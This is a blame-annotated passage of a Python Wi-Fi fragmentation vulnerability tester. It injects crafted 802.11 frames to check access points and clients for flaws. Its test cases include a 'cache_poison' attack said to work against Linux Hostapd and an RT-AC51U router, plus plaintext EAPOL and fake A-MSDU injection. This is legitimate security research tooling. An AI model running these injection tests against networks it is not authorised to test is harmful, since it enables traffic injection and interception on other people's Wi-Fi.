def rekey(self, station):
|
|
|
|
# WAG320N: does not work (Broadcom - no reply)
|
|
|
|
# MediaTek: starts handshake. But must send Msg2/4 in plaintext! Request optionally in plaintext.
|
2020-03-27 15:19:31 -04:00
|
|
|
# Maybe it's removing the current PTK before a rekey?
|
2020-03-27 14:22:12 -04:00
|
|
|
# RT-N10: we get a deauthentication as a reply. Connection is killed.
|
|
|
|
# LANCOM: does not work (no reply)
|
2020-03-28 09:32:58 -04:00
|
|
|
# Aruba: does not work (no reply)
|
2020-03-27 14:22:12 -04:00
|
|
|
# ==> Only reliable way is to configure AP to constantly rekey the PTK, and wait
|
|
|
|
# untill the AP starts a rekey.
|
2020-04-23 16:05:34 -04:00
|
|
|
if self.options.rekey_request:
|
|
|
|
log(STATUS, "Actively requesting PTK rekey", color="green")
|
|
|
|
wpaspy_command(self.wpaspy_ctrl, "KEY_REQUEST 0 1")
|
2020-04-24 14:02:05 -04:00
|
|
|
|
|
|
|
# The RT-AC51U does the 4-way rekey HS in plaintext. So in some cases we must
|
|
|
|
# remove the keys so our script will send the EAPOL frames in plaintext.
|
|
|
|
if self.options.rekey_plaintext:
|
|
|
|
log(STATUS, "Removing keys to perform rekey using plaintext EAPOL frames")
|
|
|
|
self.station.reset_keys()
|
2020-04-23 16:05:34 -04:00
|
|
|
else:
|
|
|
|
log(STATUS, "Client cannot force rekey. Waiting on AP to start PTK rekey.", color="orange")
|
2020-03-27 14:22:12 -04:00
|
|
|
|
2020-03-27 13:23:49 -04:00
|
|
|
def time_tick(self):
|
2020-04-19 08:58:35 -04:00
|
|
|
if self.time_retrans_dhcp != None and time.time() > self.time_retrans_dhcp:
|
2020-04-19 20:15:44 -04:00
|
|
|
log(WARNING, "Retransmitting DHCP message", color="orange")
|
2020-04-19 08:58:35 -04:00
|
|
|
self.get_ip(self)
|
|
|
|
|
2020-03-27 13:23:49 -04:00
|
|
|
self.station.time_tick()
|
|
|
|
|
2020-03-24 08:52:31 -04:00
|
|
|
def send_dhcp_discover(self):
|
2020-03-29 18:11:35 -04:00
|
|
|
if self.dhcp_xid == None:
|
|
|
|
self.dhcp_xid = random.randint(0, 2**31)
|
|
|
|
|
2020-03-24 08:52:31 -04:00
|
|
|
rawmac = bytes.fromhex(self.station.mac.replace(':', ''))
|
|
|
|
req = Ether(dst="ff:ff:ff:ff:ff:ff", src=self.station.mac)/IP(src="0.0.0.0", dst="255.255.255.255")
|
2020-03-29 18:11:35 -04:00
|
|
|
req = req/UDP(sport=68, dport=67)/BOOTP(op=1, chaddr=rawmac, xid=self.dhcp_xid)
|
2020-03-25 09:53:38 -04:00
|
|
|
req = req/DHCP(options=[("message-type", "discover"), "end"])
|
2020-03-27 12:58:11 -04:00
|
|
|
|
2020-04-19 08:20:40 -04:00
|
|
|
log(STATUS, f"Sending DHCP discover with XID {self.dhcp_xid}")
|
2020-03-27 12:58:11 -04:00
|
|
|
self.station.send_mon(req)
|
2020-03-24 08:52:31 -04:00
|
|
|
|
2020-03-25 09:53:38 -04:00
|
|
|
def send_dhcp_request(self, offer):
|
2020-03-24 08:52:31 -04:00
|
|
|
rawmac = bytes.fromhex(self.station.mac.replace(':', ''))
|
|
|
|
myip = offer[BOOTP].yiaddr
|
|
|
|
sip = offer[BOOTP].siaddr
|
|
|
|
xid = offer[BOOTP].xid
|
|
|
|
|
|
|
|
reply = Ether(dst="ff:ff:ff:ff:ff:ff", src=self.station.mac)/IP(src="0.0.0.0", dst="255.255.255.255")
|
2020-03-29 18:11:35 -04:00
|
|
|
reply = reply/UDP(sport=68, dport=67)/BOOTP(op=1, chaddr=rawmac, xid=self.dhcp_xid)
|
2020-03-25 09:53:38 -04:00
|
|
|
reply = reply/DHCP(options=[("message-type", "request"), ("requested_addr", myip),
|
2020-03-24 08:52:31 -04:00
|
|
|
("hostname", "fragclient"), "end"])
|
2020-03-27 12:58:11 -04:00
|
|
|
|
2020-04-19 08:20:40 -04:00
|
|
|
log(STATUS, f"Sending DHCP request with XID {self.dhcp_xid}")
|
2020-03-27 12:58:11 -04:00
|
|
|
self.station.send_mon(reply)
|
2020-03-24 08:52:31 -04:00
|
|
|
|
2020-03-25 09:53:38 -04:00
|
|
|
def handle_eth_dhcp(self, p):
|
2020-03-24 08:52:31 -04:00
|
|
|
"""Handle packets needed to connect and request an IP"""
|
2020-03-25 09:53:38 -04:00
|
|
|
if not DHCP in p: return
|
2020-03-24 08:52:31 -04:00
|
|
|
|
2020-03-25 09:53:38 -04:00
|
|
|
req_type = next(opt[1] for opt in p[DHCP].options if isinstance(opt, tuple) and opt[0] == 'message-type')
|
2020-03-04 06:36:52 -05:00
|
|
|
|
2020-03-25 09:53:38 -04:00
|
|
|
# DHCP Offer
|
|
|
|
if req_type == 2:
|
|
|
|
log(STATUS, "Received DHCP offer, sending DHCP request.")
|
|
|
|
self.send_dhcp_request(p)
|
2020-04-19 08:58:35 -04:00
|
|
|
self.dhcp_offer_frame = p
|
2020-03-07 21:10:26 -05:00
|
|
|
|
2020-03-25 09:53:38 -04:00
|
|
|
# DHCP Ack
|
|
|
|
elif req_type == 5:
|
|
|
|
clientip = p[BOOTP].yiaddr
|
|
|
|
serverip = p[IP].src
|
2020-04-19 08:58:35 -04:00
|
|
|
self.time_retrans_dhcp = None
|
2020-04-19 20:15:44 -04:00
|
|
|
log(STATUS, f"Received DHCP ack. My ip is {clientip} and router is {serverip}.", color="green")
|
2020-03-13 06:49:58 -04:00
|
|
|
|
2020-04-19 08:58:35 -04:00
|
|
|
self.initialize_peermac(p.src)
|
2020-03-25 09:53:38 -04:00
|
|
|
self.initialize_ips(clientip, serverip)
|
2020-03-24 08:52:31 -04:00
|
|
|
|
2020-04-19 08:20:40 -04:00
|
|
|
def initialize_peermac(self, peermac):
|
2020-04-24 08:21:15 -04:00
|
|
|
if peermac != self.station.bss:
|
|
|
|
log(STATUS, f"Will now use peer MAC address {peermac} instead of the BSS {self.station.bss}.")
|
2020-04-19 08:20:40 -04:00
|
|
|
self.station.set_peermac(peermac)
|
|
|
|
|
2020-03-25 09:53:38 -04:00
|
|
|
def initialize_ips(self, clientip, serverip):
|
2020-04-19 08:20:40 -04:00
|
|
|
self.arp_sock = ARP_sock(sock=self.sock_eth, IP_addr=clientip, ARP_addr=self.station.mac)
|
2020-03-25 09:53:38 -04:00
|
|
|
self.station.set_ip_addresses(clientip, serverip)
|
2020-03-24 08:52:31 -04:00
|
|
|
|
2020-03-25 09:53:38 -04:00
|
|
|
def handle_eth(self, p):
|
2020-03-29 18:11:35 -04:00
|
|
|
if BOOTP in p and p[BOOTP].xid == self.dhcp_xid:
|
2020-03-25 09:53:38 -04:00
|
|
|
self.handle_eth_dhcp(p)
|
|
|
|
else:
|
2020-03-29 18:11:35 -04:00
|
|
|
if self.arp_sock != None:
|
|
|
|
self.arp_sock.reply(p)
|
2020-03-25 09:53:38 -04:00
|
|
|
self.station.handle_eth(p)
|
2020-03-04 06:36:52 -05:00
|
|
|
|
|
|
|
def handle_wpaspy(self, msg):
|
|
|
|
log(STATUS, "daemon: " + msg)
|
|
|
|
|
2020-03-27 15:19:31 -04:00
|
|
|
if "WPA: Key negotiation completed with" in msg:
|
2020-03-27 13:23:49 -04:00
|
|
|
# This get's the current keys
|
|
|
|
self.station.handle_authenticated()
|
2020-03-25 09:53:38 -04:00
|
|
|
|
|
|
|
# Trying to authenticate with 38:2c:4a:c1:69:bc (SSID='backupnetwork2' freq=2462 MHz)
|
2020-03-24 08:52:31 -04:00
|
|
|
elif "Trying to authenticate with" in msg:
|
2020-03-04 06:36:52 -05:00
|
|
|
p = re.compile("Trying to authenticate with (.*) \(SSID")
|
2020-04-19 08:20:40 -04:00
|
|
|
bss = p.search(msg).group(1)
|
|
|
|
self.station.handle_connecting(bss)
|
2020-03-24 08:52:31 -04:00
|
|
|
|
2020-03-25 09:53:38 -04:00
|
|
|
elif "EAPOL-TX" in msg:
|
2020-03-24 08:52:31 -04:00
|
|
|
cmd, srcaddr, payload = msg.split()
|
|
|
|
self.station.handle_eapol_tx(bytes.fromhex(payload))
|
|
|
|
|
2020-04-22 19:14:35 -04:00
|
|
|
# This event only occurs with WEP
|
|
|
|
elif "WPA: EAPOL processing complete" in msg:
|
|
|
|
self.station.handle_authenticated()
|
|
|
|
|
2020-04-15 10:27:22 -04:00
|
|
|
def roam(self, station):
|
|
|
|
log(STATUS, "Roaming to the current AP.", color="green")
|
|
|
|
wpaspy_command(self.wpaspy_ctrl, "SET reassoc_same_bss_optim 0")
|
2020-04-19 08:20:40 -04:00
|
|
|
wpaspy_command(self.wpaspy_ctrl, "ROAM " + station.bss)
|
2020-04-15 10:27:22 -04:00
|
|
|
|
2020-03-29 18:11:35 -04:00
|
|
|
def reconnect(self, station):
|
2020-03-25 09:53:38 -04:00
|
|
|
log(STATUS, "Reconnecting to the AP.", color="green")
|
2020-04-24 15:02:05 -04:00
|
|
|
optim = "0" if self.options.full_reconnect else "1"
|
|
|
|
wpaspy_command(self.wpaspy_ctrl, f"SET reassoc_same_bss_optim {optim}")
|
2020-03-28 09:32:58 -04:00
|
|
|
wpaspy_command(self.wpaspy_ctrl, "REASSOCIATE")
|
2020-03-13 06:49:58 -04:00
|
|
|
|
2020-03-24 08:52:31 -04:00
|
|
|
def configure_daemon(self):
|
|
|
|
# TODO: Only enable networks once our script is ready, to prevent
|
|
|
|
# wpa_supplicant from connecting before our start started.
|
|
|
|
|
2020-03-28 09:32:58 -04:00
|
|
|
# Optimize reassoc-to-same-BSS. This makes the "REASSOCIATE" command skip the
|
|
|
|
# authentication phase (reducing the chance that packet queues are reset).
|
2020-03-29 18:11:35 -04:00
|
|
|
wpaspy_command(self.wpaspy_ctrl, "SET ext_eapol_frame_io 1")
|
2020-03-28 09:32:58 -04:00
|
|
|
|
2020-03-24 08:52:31 -04:00
|
|
|
# If the user already supplied IPs we can immediately perform tests
|
2020-04-15 10:27:22 -04:00
|
|
|
if self.options.ip and self.options.peerip:
|
|
|
|
self.initialize_ips(self.options.ip, self.options.peerip)
|
2020-03-04 06:36:52 -05:00
|
|
|
|
|
|
|
def start_daemon(self):
|
|
|
|
log(STATUS, "Starting wpa_supplicant ...")
|
|
|
|
try:
|
2020-03-07 21:10:26 -05:00
|
|
|
self.process = subprocess.Popen([
|
2020-03-04 06:36:52 -05:00
|
|
|
"../wpa_supplicant/wpa_supplicant",
|
|
|
|
"-Dnl80211",
|
|
|
|
"-i", self.nic_iface,
|
2020-04-23 10:19:14 -04:00
|
|
|
"-cclient.conf"] + log_level2switch())
|
2020-03-07 21:10:26 -05:00
|
|
|
time.sleep(1)
|
2020-03-04 06:36:52 -05:00
|
|
|
except:
|
|
|
|
if not os.path.exists("../wpa_supplicant/wpa_supplicant"):
|
2020-03-07 21:10:26 -05:00
|
|
|
log(ERROR, "wpa_supplicant executable not found. Did you compile wpa_supplicant?")
|
2020-03-04 06:36:52 -05:00
|
|
|
raise
|
|
|
|
|
2020-03-07 21:10:26 -05:00
|
|
|
clientmac = scapy.arch.get_if_hwaddr(self.nic_iface)
|
|
|
|
self.station = Station(self, clientmac, "to-DS")
|
2020-03-01 19:03:08 -05:00
|
|
|
|
2020-03-30 13:13:21 -04:00
|
|
|
# ----------------------------------- Main Function -----------------------------------
|
2020-03-01 19:03:08 -05:00
|
|
|
|
2020-03-07 21:10:26 -05:00
|
|
|
def cleanup():
|
|
|
|
daemon.stop()
|
2020-03-01 19:03:08 -05:00
|
|
|
|
2020-04-23 10:19:14 -04:00
|
|
|
def char2trigger(c):
|
|
|
|
if c == 'S': return Action.StartAuth
|
|
|
|
elif c == 'B': return Action.BeforeAuth
|
|
|
|
elif c == 'A': return Action.AfterAuth
|
|
|
|
elif c == 'C': return Action.Connected
|
|
|
|
else: raise Exception("Unknown trigger character " + c)
|
|
|
|
|
|
|
|
def stract2action(stract):
|
|
|
|
if len(stract) == 1:
|
|
|
|
trigger = Action.Connected
|
|
|
|
c = stract[0]
|
|
|
|
else:
|
|
|
|
trigger = char2trigger(stract[0])
|
|
|
|
c = stract[1]
|
|
|
|
|
2020-04-22 19:14:35 -04:00
|
|
|
if c == 'I':
|
2020-04-23 10:19:14 -04:00
|
|
|
return Action(trigger, action=Action.GetIp)
|
|
|
|
elif c == 'R':
|
|
|
|
return Action(trigger, action=Action.Rekey)
|
2020-04-23 15:43:47 -04:00
|
|
|
elif c == 'C':
|
|
|
|
return Action(trigger, action=Action.Reconnect)
|
2020-04-22 19:14:35 -04:00
|
|
|
elif c == 'P':
|
2020-04-23 10:19:14 -04:00
|
|
|
return Action(trigger, enc=False)
|
2020-04-22 19:14:35 -04:00
|
|
|
elif c == 'E':
|
2020-04-23 10:19:14 -04:00
|
|
|
return Action(trigger, enc=True)
|
2020-04-24 09:56:32 -04:00
|
|
|
elif c == 'D':
|
|
|
|
return Action(meta_action=Action.MetaDrop)
|
2020-04-22 19:14:35 -04:00
|
|
|
|
|
|
|
raise Exception("Unrecognized action")
|
|
|
|
|
2020-04-25 10:12:44 -04:00
|
|
|
def prepare_tests(test_name, stractions, delay=0, inc_pn=0, as_msdu=None, ptype=None, bcast=False):
|
2020-04-23 11:50:21 -04:00
|
|
|
if test_name == "ping":
|
|
|
|
if stractions != None:
|
|
|
|
actions = [stract2action(stract) for stract in stractions.split(",")]
|
|
|
|
else:
|
2020-04-22 19:14:35 -04:00
|
|
|
actions = [Action(Action.Connected, action=Action.GetIp),
|
|
|
|
Action(Action.Connected, enc=True)]
|
|
|
|
|
2020-04-25 10:12:44 -04:00
|
|
|
test = PingTest(REQ_ICMP, actions, as_msdu=as_msdu, bcast=bcast)
|
2020-04-22 19:14:35 -04:00
|
|
|
|
2020-04-23 10:19:14 -04:00
|
|
|
elif test_name == "ping_frag_sep":
|
2020-04-23 16:05:34 -04:00
|
|
|
# Check if we can send frames in between fragments. The seperator uses a different QoS TID.
|
|
|
|
# The second fragment must use an incremental PN compared to the first fragment. So this
|
|
|
|
# also tests if the receivers uses a per-QoS receive replay counter.
|
2020-04-23 10:19:14 -04:00
|
|
|
separator = Dot11(type="Data", subtype=8, SC=(33 << 4) | 0)/Dot11QoS(TID=1)/LLC()/SNAP()
|
2020-04-22 19:14:35 -04:00
|
|
|
test = PingTest(REQ_ICMP,
|
|
|
|
[Action(Action.Connected, action=Action.GetIp),
|
|
|
|
Action(Action.Connected, enc=True),
|
2020-04-23 16:05:34 -04:00
|
|
|
Action(Action.Connected, enc=True, inc_pn=0)],
|
2020-04-25 10:12:44 -04:00
|
|
|
separate_with=separator, as_msdu=as_msdu, bcast=bcast,
|
2020-04-23 10:19:14 -04:00
|
|
|
)
|
2020-04-22 19:14:35 -04:00
|
|
|
|
|
|
|
elif test_name == "wep_mixed_key":
|
|
|
|
log(WARNING, "Cannot predict WEP key reotation. Fragment may time out, use very short key rotation!", color="orange")
|
|
|
|
test = PingTest(REQ_ICMP,
|
|
|
|
[Action(Action.Connected, action=Action.GetIp),
|
|
|
|
Action(Action.Connected, enc=True),
|
|
|
|
# On a WEP key rotation we get a Connected event. So wait for that.
|
|
|
|
Action(Action.AfterAuth, enc=True),
|
|
|
|
])
|
|
|
|
|
|
|
|
elif test_name == "cache_poison":
|
2020-03-30 13:53:56 -04:00
|
|
|
# Cache poison attack. Worked against Linux Hostapd and RT-AC51U.
|
|
|
|
test = PingTest(REQ_ICMP,
|
2020-04-15 10:27:22 -04:00
|
|
|
[Action(Action.Connected, enc=True),
|
|
|
|
Action(Action.Connected, action=Action.Reconnect),
|
|
|
|
Action(Action.AfterAuth, enc=True)])
|
2020-03-30 13:53:56 -04:00
|
|
|
|
2020-04-23 11:50:21 -04:00
|
|
|
elif test_name == "eapol_msdu":
|
|
|
|
if stractions != None:
|
2020-04-24 08:21:15 -04:00
|
|
|
prefix, specific = stractions[:-3], stractions[-2:]
|
|
|
|
actions = []
|
|
|
|
if len(prefix) > 0:
|
|
|
|
actions = [stract2action(stract) for stract in prefix.split(",")]
|
|
|
|
actions += [Action(char2trigger(t), enc=False) for t in specific]
|
2020-04-23 11:50:21 -04:00
|
|
|
else:
|
|
|
|
actions = [Action(Action.StartAuth, enc=False),
|
|
|
|
Action(Action.StartAuth, enc=False)]
|
|
|
|
|
|
|
|
test = EapolMsduTest(REQ_ICMP, actions)
|
|
|
|
|
2020-04-23 12:06:04 -04:00
|
|
|
elif test_name == "linux_plain":
|
|
|
|
test = LinuxTest(REQ_ICMP)
|
|
|
|
|
2020-04-23 11:50:21 -04:00
|
|
|
elif test_name == "macos":
|
2020-04-23 12:38:54 -04:00
|
|
|
if stractions != None:
|
|
|
|
actions = [Action(char2trigger(t), enc=False) for t in stractions]
|
|
|
|
else:
|
|
|
|
actions = [Action(Action.StartAuth, enc=False),
|
|
|
|
Action(Action.StartAuth, enc=False)]
|
|
|
|
|
|
|
|
test = MacOsTest(REQ_ICMP, actions)
|
2020-04-23 11:50:21 -04:00
|
|
|
|
|
|
|
elif test_name == "qca_test":
|
|
|
|
test = QcaDriverTest()
|
|
|
|
|
|
|
|
elif test_name == "qca_split":
|
|
|
|
test = QcaTestSplit()
|
|
|
|
|
|
|
|
elif test_name == "qca_rekey":
|
|
|
|
test = QcaDriverRekey()
|
|
|
|
|
2020-04-22 19:14:35 -04:00
|
|
|
# -----------------------------------------------------------------------------------------
|
|
|
|
|
2020-04-01 10:14:07 -04:00
|
|
|
# XXX TODO : Hardware decrypts it using old key, software using new key?
|
|
|
|
# So right after rekey we inject first with old key, second with new key?
|
|
|
|
|
|
|
|
# XXX TODO : What about extended functionality where we can have
|
|
|
|
# two simultaneously pairwise keys?!?!
|
2020-03-30 13:53:56 -04:00
|
|
|
|
|
|
|
# TODO:
|
|
|
|
# - Test case to check if the receiver supports interleaved priority
|
|
|
|
# reception. It seems Windows 10 / Intel might not support this.
|
|
|
|
# - Test case with a very lage aggregated frame (which is normally not
|
|
|
|
# allowed but some may accept it). And a variation to check how APs
|
|
|
|
# will forward such overly large frame (e.g. force fragmentation).
|
2020-04-23 10:19:14 -04:00
|
|
|
# - [TKIP] Encrpted, Encrypted, no global MIC
|
|
|
|
# - Plain/Enc tests but first plaintext sent before installing key
|
2020-04-15 10:27:22 -04:00
|
|
|
# - Test fragmentation of management frames
|
|
|
|
# - Test fragmentation of group frames (STA mode of RT-AC51u?)
|
2020-03-30 13:53:56 -04:00
|
|
|
|
2020-04-23 12:26:00 -04:00
|
|
|
# If requested, override delay and inc_pn parameters in the test.
|
2020-04-23 10:19:14 -04:00
|
|
|
test.set_options(delay, inc_pn)
|
|
|
|
|
2020-04-23 12:26:00 -04:00
|
|
|
# If requested, override the ptype
|
|
|
|
if ptype != None:
|
|
|
|
if not hasattr(test, "ptype"):
|
|
|
|
log(WARNING, "Cannot override request type of this test.")
|
|
|
|
quit(1)
|
|
|
|
test.ptype = ptype
|
|
|
|
|
2020-03-30 13:53:56 -04:00
|
|
|
return test
|
2020-03-01 19:03:08 -05:00
|
|
|
|
2020-04-23 12:26:00 -04:00
|
|
|
def args2ptype(args):
|
|
|
|
# Only one of these should be given
|
|
|
|
if args.arp + args.dhcp + args.icmp > 1:
|
|
|
|
log(STATUS, "You cannot combine --arp, --dhcp, or --icmp. Please only supply one of them.")
|
|
|
|
quit(1)
|
|
|
|
|
|
|
|
if args.arp: return REQ_ARP
|
|
|
|
if args.dhcp: return REQ_DHCP
|
|
|
|
if args.icmp: return REQ_ICMP
|
|
|
|
|
|
|
|
return None
|
|
|
|
|
2020-04-23 21:15:15 -04:00
|
|
|
def args2msdu(args):
|
|
|
|
# Only one of these should be given
|
|
|
|
if args.msdu + args.fake_msdu > 1:
|
|
|
|
log(STATUS, "You cannot combine --msdu and --fake_msdu. Please only supply one of them.")
|
|
|
|
quit(1)
|
|
|
|
|
|
|
|
if args.msdu: return 1
|
|
|
|
if args.fake_msdu: return 2
|
|
|
|
|
|
|
|
return None
|
|
|
|
|
|
|
|
|
2020-02-27 07:07:19 -05:00
|
|
|
if __name__ == "__main__":
|
2020-03-30 13:53:56 -04:00
|
|
|
log(WARNING, "Remember to use a modified backports and ath9k_htc firmware!\n")
|
2020-02-27 07:07:19 -05:00
|
|
|
|
2020-04-15 10:27:22 -04:00
|
|
|
parser = argparse.ArgumentParser(description="Test for fragmentation vulnerabilities.")
|
|
|
|
parser.add_argument('iface', help="Interface to use for the tests.")
|
|
|
|
parser.add_argument('testname', help="Name or identifier of the test to run.")
|
2020-04-22 19:14:35 -04:00
|
|
|
parser.add_argument('actions', nargs='?', help="Optional textual descriptions of actions")
|
2020-04-15 10:27:22 -04:00
|
|
|
parser.add_argument('--ip', help="IP we as a sender should use.")
|
|
|
|
parser.add_argument('--peerip', help="IP of the device we will test.")
|
|
|
|
parser.add_argument('--ap', default=False, action='store_true', help="Act as an AP to test clients.")
|
|
|
|
parser.add_argument('--debug', type=int, default=0, help="Debug output level.")
|
2020-04-23 15:43:47 -04:00
|
|
|
parser.add_argument('--delay', type=float, default=0, help="Delay between fragments in certain tests.")
|
2020-04-23 16:05:16 -04:00
|
|
|
parser.add_argument('--inc-pn', type=int, help="To test non-sequential packet number in fragments.")
|
2020-04-23 10:19:14 -04:00
|
|
|
parser.add_argument('--msdu', default=False, action='store_true', help="Encapsulate pings in an A-MSDU frame.")
|
2020-04-23 21:15:15 -04:00
|
|
|
parser.add_argument('--fake-msdu', default=False, action='store_true', help="Set A-MSDU flag but include normal payload.")
|
2020-04-23 12:26:00 -04:00
|
|
|
parser.add_argument('--arp', default=False, action='store_true', help="Override default request with ARP request.")
|
|
|
|
parser.add_argument('--dhcp', default=False, action='store_true', help="Override default request with DHCP discover.")
|
|
|
|
parser.add_argument('--icmp', default=False, action='store_true', help="Override default request with ICMP ping request.")
|
2020-04-23 16:05:34 -04:00
|
|
|
parser.add_argument('--rekey-request', default=False, action='store_true', help="Actively request PTK rekey as client.")
|
2020-04-24 14:02:05 -04:00
|
|
|
parser.add_argument('--rekey-plaintext', default=False, action='store_true', help="Do PTK rekey with plaintext EAPOL frames.")
|
2020-04-24 15:02:05 -04:00
|
|
|
parser.add_argument('--full-reconnect', default=False, action='store_true', help="Reconnect by deauthenticating first.")
|
2020-04-25 10:12:44 -04:00
|
|
|
parser.add_argument('--bcast', default=False, action='store_true', help="Send pings using broadcast receiver address.")
|
2020-04-15 10:27:22 -04:00
|
|
|
args = parser.parse_args()
|
|
|
|
|
2020-04-23 12:26:00 -04:00
|
|
|
ptype = args2ptype(args)
|
2020-04-23 21:15:15 -04:00
|
|
|
as_msdu = args2msdu(args)
|
2020-04-23 12:26:00 -04:00
|
|
|
|
2020-04-15 10:27:22 -04:00
|
|
|
# Convert parsed options to TestOptions object
|
2020-03-01 19:03:08 -05:00
|
|
|
options = TestOptions()
|
2020-04-15 10:27:22 -04:00
|
|
|
options.interface = args.iface
|
2020-04-25 10:12:44 -04:00
|
|
|
options.test = prepare_tests(args.testname, args.actions, args.delay, args.inc_pn, as_msdu, ptype, args.bcast)
|
2020-04-15 10:27:22 -04:00
|
|
|
options.ip = args.ip
|
|
|
|
options.peerip = args.peerip
|
2020-04-23 16:05:34 -04:00
|
|
|
options.rekey_request = args.rekey_request
|
2020-04-24 14:02:05 -04:00
|
|
|
options.rekey_plaintext = args.rekey_plaintext
|
2020-04-24 15:02:05 -04:00
|
|
|
options.full_reconnect = args.full_reconnect
|
2020-03-01 19:03:08 -05:00
|
|
|
|
2020-03-24 08:52:31 -04:00
|
|
|
# Parse remaining options
|
2020-04-15 10:27:22 -04:00
|
|
|
global_log_level -= args.debug
|
2020-03-01 19:03:08 -05:00
|
|
|
|
2020-04-19 20:15:44 -04:00
|
|
|
# Now start the tests --- TODO: Inject Deauths before connecting with client...
|
2020-04-15 10:27:22 -04:00
|
|
|
if args.ap:
|
2020-03-07 21:10:26 -05:00
|
|
|
daemon = Authenticator(options)
|
|
|
|
else:
|
|
|
|
daemon = Supplicant(options)
|
2020-02-27 07:07:19 -05:00
|
|
|
atexit.register(cleanup)
|
2020-03-07 21:10:26 -05:00
|
|
|
daemon.run()
|
2020-02-27 07:07:19 -05:00
|
|
|
|